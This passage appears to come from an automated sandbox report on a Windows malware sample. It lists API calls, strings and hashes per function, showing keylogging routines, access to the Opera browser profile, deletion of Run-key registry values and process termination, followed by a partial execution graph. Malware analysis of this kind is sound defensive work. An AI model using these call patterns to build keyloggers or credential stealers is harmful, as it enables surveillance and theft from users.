                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                          • API String ID: 1174141254-1629609700
                                                          • Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                          • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                          • Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                          • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                          Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 0040B64B
                                                            • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                            • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                            • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                            • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                            • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                            • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                            • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: b99914e28c38a6df7d0c4dd8e7e2660e658301fcb38244262cae42baa40b951a
                                                          • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                          • Opcode Fuzzy Hash: b99914e28c38a6df7d0c4dd8e7e2660e658301fcb38244262cae42baa40b951a
                                                          • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                          Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                          • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: uD
                                                          • API String ID: 0-2547262877
                                                          • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                          • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                          • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                          • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                          Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: !D@$open
                                                          • API String ID: 587946157-1586967515
                                                          • Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                          • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                          • Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                          • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                          Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                                          • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                          • Opcode Fuzzy Hash: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                                          • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                          Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          • __Init_thread_footer.LIBCMT ref: 00410F29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: ,kG$0kG
                                                          • API String ID: 1881088180-2015055088
                                                          • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                          • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                          • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                          • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                          Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                          • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                          • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                          Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteDirectoryFileRemove
                                                          • String ID: pth_unenc
                                                          • API String ID: 3325800564-4028850238
                                                          • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                          • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                          • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                          • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                          Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ObjectProcessSingleTerminateWait
                                                          • String ID: pth_unenc
                                                          • API String ID: 1872346434-4028850238
                                                          • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                          • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                          • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                          • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                          Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                          • GetLastError.KERNEL32 ref: 00440D35
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                          • String ID:
                                                          • API String ID: 1717984340-0
                                                          • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                          • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                          • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                          • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                          Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                          • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                          • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastRead
                                                          • String ID:
                                                          • API String ID: 4100373531-0
                                                          • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                          • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                          • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                          • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

                                                          Execution Graph

                                                          Execution Coverage:6.5%
                                                          Dynamic/Decrypted Code Coverage:9.1%
                                                          Signature Coverage:0.8%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:67
                                                          execution_graph 40462 441a73 146 API calls 40779 441819 40782 430737 40779->40782 40781 441825 40783 430756 40782->40783 40784 43076d 40782->40784 40785 430774 40783->40785 40786 43075f 40783->40786 40784->40781 40788 43034a memcpy 40785->40788 40803 4169a7 11 API calls 40786->40803 40791 43077e 40788->40791 40789 4307ce 40790 430819 memset 40789->40790 40796 415b2c 40789->40796 40790->40784 40791->40784 40791->40789 40794 4307fa 40791->40794 40793 4307e9 40793->40784 40793->40790 40804 4169a7 11 API calls 40794->40804 40797 415b42 40796->40797 40802 415b46 40796->40802 40798 415b94 40797->40798 40800 415b5a 40797->40800 40797->40802 40799 4438b5 10 API calls 40798->40799 40799->40802 40801 415b79 memcpy 40800->40801 40800->40802 40801->40802 40802->40793 40803->40784 40804->40784 37684 442ec6 19 API calls 37861 4152c6 malloc 37862 4152e2 37861->37862 37863 4152ef 37861->37863 37865 416760 11 API calls 37863->37865 37865->37862 38487 4466f4 38506 446904 38487->38506 38489 446700 GetModuleHandleA 38492 446710 __set_app_type __p__fmode __p__commode 38489->38492 38491 4467a4 38493 4467ac __setusermatherr 38491->38493 38494 4467b8 38491->38494 38492->38491 38493->38494 38507 4468f0 _controlfp 38494->38507 38496 4467bd _initterm __wgetmainargs _initterm 38497 44681e GetStartupInfoW 38496->38497 38498 446810 38496->38498 38500 446866 GetModuleHandleA 38497->38500 38508 41276d 38500->38508 38504 446896 exit 38505 44689d _cexit 38504->38505 38505->38498 38506->38489 38507->38496 38509 41277d 38508->38509 38551 4044a4 LoadLibraryW 38509->38551 38511 412785 38542 412789 38511->38542 38559 414b81 38511->38559 38514 4127c8 38565 412465 memset ??2@YAPAXI 38514->38565 38516 4127ea 38577 40ac21 38516->38577 38521 412813 38595 40dd07 memset 38521->38595 38522 412827 38600 40db69 memset 38522->38600 38526 412822 38621 4125b6 ??3@YAXPAX 38526->38621 38527 40ada2 _wcsicmp 38528 41283d 38527->38528 38528->38526 38531 412863 CoInitialize 38528->38531 38605 41268e 38528->38605 38625 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38531->38625 38535 41296f 38627 40b633 38535->38627 38537 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38543 412957 38537->38543 38548 4128ca 38537->38548 38542->38504 38542->38505 38543->38526 38544 4128d0 TranslateAcceleratorW 38545 412941 GetMessageW 38544->38545 38544->38548 38545->38543 38545->38544 38546 412909 IsDialogMessageW 38546->38545 38546->38548 38547 4128fd IsDialogMessageW 38547->38545 38547->38546 38548->38544 38548->38546 38548->38547 38549 41292b TranslateMessage DispatchMessageW 38548->38549 38550 41291f IsDialogMessageW 38548->38550 38549->38545 38550->38545 38550->38549 38552 4044cf GetProcAddress 38551->38552 38556 4044f7 38551->38556 38553 4044e8 FreeLibrary 38552->38553 38554 4044df 38552->38554 38555 4044f3 38553->38555 38553->38556 38554->38553 38555->38556 38557 404507 MessageBoxW 38556->38557 38558 40451e 38556->38558 38557->38511 38558->38511 38560 414b8a 38559->38560 38561 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38559->38561 38631 40a804 memset 38560->38631 38561->38514 38564 414b9e GetProcAddress 38564->38561 38567 4124e0 38565->38567 38566 412505 ??2@YAPAXI 38568 41251c 38566->38568 38571 412521 38566->38571 38567->38566 38653 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38568->38653 38642 444722 38571->38642 38576 41259b wcscpy 38576->38516 38658 40b1ab ??3@YAXPAX ??3@YAXPAX 38577->38658 38579 40ad76 38659 40aa04 38579->38659 38582 40ad4b 38582->38579 38682 40a9ce 38582->38682 38583 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38589 40ac5c 38583->38589 38585 40ace7 ??3@YAXPAX 38585->38589 38589->38579 38589->38582 38589->38583 38589->38585 38662 40a8d0 38589->38662 38674 4099f4 38589->38674 38590 40a8d0 7 API calls 38590->38579 38591 40ada2 38592 40adaa 38591->38592 38593 40adc9 38591->38593 38592->38593 38594 40adb3 _wcsicmp 38592->38594 38593->38521 38593->38522 38594->38592 38594->38593 38687 40dce0 38595->38687 38597 40dd3a GetModuleHandleW 38692 40dba7 38597->38692 38601 40dce0 3 API calls 38600->38601 38602 40db99 38601->38602 38764 40dae1 38602->38764 38778 402f3a 38605->38778 38607 412766 38607->38526 38607->38531 38608 4126d3 _wcsicmp 38609 4126a8 38608->38609 38609->38607 38609->38608 38611 41270a 38609->38611 38812 4125f8 7 API calls 38609->38812 38611->38607 38781 411ac5 38611->38781 38622 4125da 38621->38622 38623 4125f0 38622->38623 38624 4125e6 DeleteObject 38622->38624 38626 40b1ab ??3@YAXPAX ??3@YAXPAX 38623->38626 38624->38623 38625->38537 38626->38535 38628 40b640 38627->38628 38629 40b639 ??3@YAXPAX 38627->38629 38630 40b1ab ??3@YAXPAX ??3@YAXPAX 38628->38630 38629->38628 38630->38542 38632 40a83b GetSystemDirectoryW 38631->38632 38633 40a84c wcscpy 38631->38633 38632->38633 38638 409719 wcslen 38633->38638 38636 40a881 LoadLibraryW 38637 40a886 38636->38637 38637->38561 38637->38564 38639 409724 38638->38639 38640 409739 wcscat LoadLibraryW 38638->38640 38639->38640 38641 40972c wcscat 38639->38641 38640->38636 38640->38637 38641->38640 38643 444732 38642->38643 38644 444728 DeleteObject 38642->38644 38654 409cc3 38643->38654 38644->38643 38646 412551 38647 4010f9 38646->38647 38648 401130 38647->38648 38649 401134 GetModuleHandleW LoadIconW 38648->38649 38650 401107 wcsncat 38648->38650 38651 40a7be 38649->38651 38650->38648 38652 40a7d2 38651->38652 38652->38576 38652->38652 38653->38571 38657 409bfd memset wcscpy 38654->38657 38656 409cdb CreateFontIndirectW 38656->38646 38657->38656 38658->38589 38660 40aa14 38659->38660 38661 40aa0a ??3@YAXPAX 38659->38661 38660->38591 38661->38660 38663 40a8eb 38662->38663 38664 40a8df wcslen 38662->38664 38665 40a906 ??3@YAXPAX 38663->38665 38666 40a90f 38663->38666 38664->38663 38667 40a919 38665->38667 38668 4099f4 3 API calls 38666->38668 38669 40a932 38667->38669 38670 40a929 ??3@YAXPAX 38667->38670 38668->38667 38672 4099f4 3 API calls 38669->38672 38671 40a93e memcpy 38670->38671 38671->38589 38673 40a93d 38672->38673 38673->38671 38675 409a41 38674->38675 38676 4099fb malloc 38674->38676 38675->38589 38678 409a37 38676->38678 38679 409a1c 38676->38679 38678->38589 38680 409a30 ??3@YAXPAX 38679->38680 38681 409a20 memcpy 38679->38681 38680->38678 38681->38680 38683 40a9e7 38682->38683 38684 40a9dc ??3@YAXPAX 38682->38684 38686 4099f4 3 API calls 38683->38686 38685 40a9f2 38684->38685 38685->38590 38686->38685 38711 409bca GetModuleFileNameW 38687->38711 38689 40dce6 wcsrchr 38690 40dcf5 38689->38690 38691 40dcf9 wcscat 38689->38691 38690->38691 38691->38597 38712 44db70 38692->38712 38696 40dbfd 38715 4447d9 38696->38715 38699 40dc34 wcscpy wcscpy 38741 40d6f5 38699->38741 38700 40dc1f wcscpy 38700->38699 38703 40d6f5 3 API calls 38704 40dc73 38703->38704 38705 40d6f5 3 API calls 38704->38705 38706 40dc89 38705->38706 38707 40d6f5 3 API calls 38706->38707 38708 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38707->38708 38747 40da80 38708->38747 38711->38689 38713 40dbb4 memset memset 38712->38713 38714 409bca GetModuleFileNameW 38713->38714 38714->38696 38717 4447f4 38715->38717 38716 40dc1b 38716->38699 38716->38700 38717->38716 38718 444807 ??2@YAPAXI 38717->38718 38719 44481f 38718->38719 38720 444873 _snwprintf 38719->38720 38721 4448ab wcscpy 38719->38721 38754 44474a 8 API calls 38720->38754 38723 4448bb 38721->38723 38755 44474a 8 API calls 38723->38755 38724 4448a7 38724->38721 38724->38723 38726 4448cd 38756 44474a 8 API calls 38726->38756 38728 4448e2 38757 44474a 8 API calls 38728->38757 38730 4448f7 38758 44474a 8 API calls 38730->38758 38732 44490c 38759 44474a 8 API calls 38732->38759 38734 444921 38760 44474a 8 API calls 38734->38760 38736 444936 38761 44474a 8 API calls 38736->38761 38738 44494b 38762 44474a 8 API calls 38738->38762 38740 444960 ??3@YAXPAX 38740->38716 38742 44db70 38741->38742 38743 40d702 memset GetPrivateProfileStringW 38742->38743 38744 40d752 38743->38744 38745 40d75c WritePrivateProfileStringW 38743->38745 38744->38745 38746 40d758 38744->38746 38745->38746 38746->38703 38748 44db70 38747->38748 38749 40da8d memset 38748->38749 38750 40daac LoadStringW 38749->38750 38751 40dac6 38750->38751 38751->38750 38753 40dade 38751->38753 38763 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38751->38763 38753->38526 38754->38724 38755->38726 38756->38728 38757->38730 38758->38732 38759->38734 38760->38736 38761->38738 38762->38740 38763->38751 38774 409b98 GetFileAttributesW 38764->38774 38766 40daea 38767 40db63 38766->38767 38768 40daef wcscpy wcscpy GetPrivateProfileIntW 38766->38768 38767->38527 38775 40d65d GetPrivateProfileStringW 38768->38775 38770 40db3e 38776 40d65d GetPrivateProfileStringW 38770->38776 38772 40db4f 38777 40d65d GetPrivateProfileStringW 38772->38777 38774->38766 38775->38770 38776->38772 38777->38767 38813 40eaff 38778->38813 38782 411ae2 memset 38781->38782 38783 411b8f 38781->38783 38853 409bca GetModuleFileNameW 38782->38853 38795 411a8b 38783->38795 38785 411b0a wcsrchr 38786 411b22 wcscat 38785->38786 38787 411b1f 38785->38787 38854 414770 wcscpy wcscpy wcscpy CloseHandle 38786->38854 38787->38786 38789 411b67 38855 402afb 38789->38855 38793 411b7f 38911 40ea13 SendMessageW memset SendMessageW 38793->38911 38796 402afb 27 API calls 38795->38796 38797 411ac0 38796->38797 38798 4110dc 38797->38798 38799 41113e 38798->38799 38804 4110f0 38798->38804 38936 40969c LoadCursorW SetCursor 38799->38936 38801 411143 38937 4032b4 38801->38937 38955 444a54 38801->38955 38802 4110f7 _wcsicmp 38802->38804 38803 411157 38805 40ada2 _wcsicmp 38803->38805 38804->38799 38804->38802 38958 410c46 10 API calls 38804->38958 38808 411167 38805->38808 38806 4111af 38808->38806 38809 4111a6 qsort 38808->38809 38809->38806 38812->38609 38814 40eb10 38813->38814 38826 40e8e0 38814->38826 38817 40eb6c memcpy memcpy 38818 40ebb7 38817->38818 38818->38817 38819 40ebf2 ??2@YAPAXI ??2@YAPAXI 38818->38819 38820 40d134 16 API calls 38818->38820 38821 40ec2e ??2@YAPAXI 38819->38821 38824 40ec65 38819->38824 38820->38818 38821->38824 38836 40ea7f 38824->38836 38825 402f49 38825->38609 38827 40e8f2 38826->38827 38828 40e8eb ??3@YAXPAX 38826->38828 38829 40e900 38827->38829 38830 40e8f9 ??3@YAXPAX 38827->38830 38828->38827 38831 40e90a ??3@YAXPAX 38829->38831 38833 40e911 38829->38833 38830->38829 38831->38833 38832 40e931 ??2@YAPAXI ??2@YAPAXI 38832->38817 38833->38832 38834 40e921 ??3@YAXPAX 38833->38834 38835 40e92a ??3@YAXPAX 38833->38835 38834->38835 38835->38832 38837 40aa04 ??3@YAXPAX 38836->38837 38838 40ea88 38837->38838 38839 40aa04 ??3@YAXPAX 38838->38839 38840 40ea90 38839->38840 38841 40aa04 ??3@YAXPAX 38840->38841 38842 40ea98 38841->38842 38843 40aa04 ??3@YAXPAX 38842->38843 38844 40eaa0 38843->38844 38845 40a9ce 4 API calls 38844->38845 38846 40eab3 38845->38846 38847 40a9ce 4 API calls 38846->38847 38848 40eabd 38847->38848 38849 40a9ce 4 API calls 38848->38849 38850 40eac7 38849->38850 38851 40a9ce 4 API calls 38850->38851 38852 40ead1 38851->38852 38852->38825 38853->38785 38854->38789 38912 40b2cc 38855->38912 38857 402b0a 38858 40b2cc 27 API calls 38857->38858 38859 402b23 38858->38859 38860 40b2cc 27 API calls 38859->38860 38861 402b3a 38860->38861 38862 40b2cc 27 API calls 38861->38862 38863 402b54 38862->38863 38864 40b2cc 27 API calls 38863->38864 38865 402b6b 38864->38865 38866 40b2cc 27 API calls 38865->38866 38867 402b82 38866->38867 38868 40b2cc 27 API calls 38867->38868 38869 402b99 38868->38869 38870 40b2cc 27 API calls 38869->38870 38871 402bb0 38870->38871 38872 40b2cc 27 API calls 38871->38872 38873 402bc7 38872->38873 38874 40b2cc 27 API calls 38873->38874 38875 402bde 38874->38875 38876 40b2cc 27 API calls 38875->38876 38877 402bf5 38876->38877 38878 40b2cc 27 API calls 38877->38878 38879 402c0c 38878->38879 38880 40b2cc 27 API calls 38879->38880 38881 402c23 38880->38881 38882 40b2cc 27 API calls 38881->38882 38883 402c3a 38882->38883 38884 40b2cc 27 API calls 38883->38884 38885 402c51 38884->38885 38886 40b2cc 27 API calls 38885->38886 38887 402c68 38886->38887 38888 40b2cc 27 API calls 38887->38888 38889 402c7f 38888->38889 38890 40b2cc 27 API calls 38889->38890 38891 402c99 38890->38891 38892 40b2cc 27 API calls 38891->38892 38893 402cb3 38892->38893 38894 40b2cc 27 API calls 38893->38894 38895 402cd5 38894->38895 38896 40b2cc 27 API calls 38895->38896 38897 402cf0 38896->38897 38898 40b2cc 27 API calls 38897->38898 38899 402d0b 38898->38899 38900 40b2cc 27 API calls 38899->38900 38901 402d26 38900->38901 38902 40b2cc 27 API calls 38901->38902 38903 402d3e 38902->38903 38904 40b2cc 27 API calls 38903->38904 38905 402d59 38904->38905 38906 40b2cc 27 API calls 38905->38906 38907 